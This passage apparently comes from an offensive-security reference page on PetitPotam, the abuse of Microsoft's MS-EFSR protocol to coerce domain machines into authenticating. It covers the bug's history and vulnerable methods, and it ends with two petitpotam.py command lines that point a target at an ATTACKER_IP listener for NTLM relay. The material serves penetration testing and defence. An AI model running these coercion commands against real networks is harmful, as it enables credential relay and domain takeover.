MS-EFSR abuse (PetitPotam)
MS-EFSR is Microsoft's Encrypting File System Remote protocol. It performs maintenance and management operations on encrypted data that is stored remotely and accessed over a network (docs.microsoft.com) and is available as an RPC interface. That interface is available through the
\pipe\netlogonSMB named pipes.
In 2019, Google's Project Zero research team found and reported a bug on MS-EFSR that could be combined with a NTLM Reflection attack leading to a Local Privilege Elevation. An insufficient path check in MS-EFSR's
EfsRpcOpenFileRawmethod allowed attackers to force the
SYSTEMaccount into creating an executable file of the attacker's choosing, hence providing the attacker with local admin rights.
While the wider implications of this bug, AD-DS-wise, were only suspected, in 2021, Lionel GILLES used that bug to remotely coerce domain-joined machine's authentication. The coerced authentications are made over SMB. But MS-EFSR abuse can be combined with WebClient abuse to elicit incoming authentications made over HTTP which heightens NTLM relay capabilities.
The following MS-EFSR's methods were detected vulnerable
EfsRpcAddUsersToFileEx(unpatched at the time of this article update, 29th December 2021)
Petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP
petitpotam.py -method AddUsersToFile $TARGET_IP '\\$ATTACKER_IP\share\foo'